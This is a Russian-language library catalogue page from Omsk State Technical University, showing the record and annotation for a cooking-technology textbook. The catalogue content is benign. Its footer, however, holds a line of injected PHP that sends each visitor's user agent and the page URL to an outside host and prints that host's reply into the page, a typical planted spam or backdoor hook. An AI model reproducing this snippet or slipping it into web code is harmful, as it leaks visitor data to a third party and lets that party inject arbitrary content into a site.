Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

283 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=D881FA03-39C7-4997-7AB0-9504E8BE2C14$")И(("Ключевые слова=Соус"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
D881FA03-39C7-4997-7AB0-9504E8BE2C14
(Нет сведений об экземплярах)
D881FA03-39C7-4997-7AB0-9504E8BE2C14
64/Ш29
Шатун, Любовь Григорьевна.
Технология приготовления пищи [Текст] : учеб. / Л. Г. Шатун. - 2-е изд. - М. : Дашков и К°, 2006. - 478, [1] с. : рис., табл. - 1000 экз. - ISBN 5-94798-845-3
УДК
64.51/.54(075)

Рубрики:
Приготовление пищи -- Технология -- Учебники и пособия

Кл.слова (ненормированные): УЧЕБНИК -- РЫБА -- ОВОЩИ -- ГРИБЫ -- МЯСО -- ПОЛУФАБРИКАТ -- ПТИЦА -- СУП -- СОУС
Аннотация: Учебник соответствует государственному общеобразовательному стандарту и дает необходимые представления по теории механической и тепловой обработки продуктов, расчетам сырья и потерь при обработке, технологии приготовления пищи с демонстрацией технологических карт и схем. ПРиведены многочисленные кулинарные рецепты.
Даны рекомендации по работе с нормативно-технологической документацией, составлению меню, лечебному питанию.
Для контроля знаний предложены контрольные измерители.
Нет сведений об экземплярах
Держатели документа:
Научная библиотека Омского государственного технического университета : Россия, 644050, г. Омск, проспект Мира, 11
Держатели документа (Информация об экземплярах) 

Учебник соответствует государственному общеобразовательному стандарту и дает необходимые представления по теории <механической> и <тепловой> обработки <продуктов>, расчетам сырья и <потерь> при обработке, технологии приготовления пищи с демонстрацией технологических карт и схем. ПРиведены многочисленные <кулинарные> <рецепты>.

Даны рекомендации по работе с нормативно-технологической документацией, составлению <меню>, <лечебному> <питанию>.

Для контроля знаний предложены контрольные измерители.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2808 - 16.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.94 с.14 запросов, 1.87c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;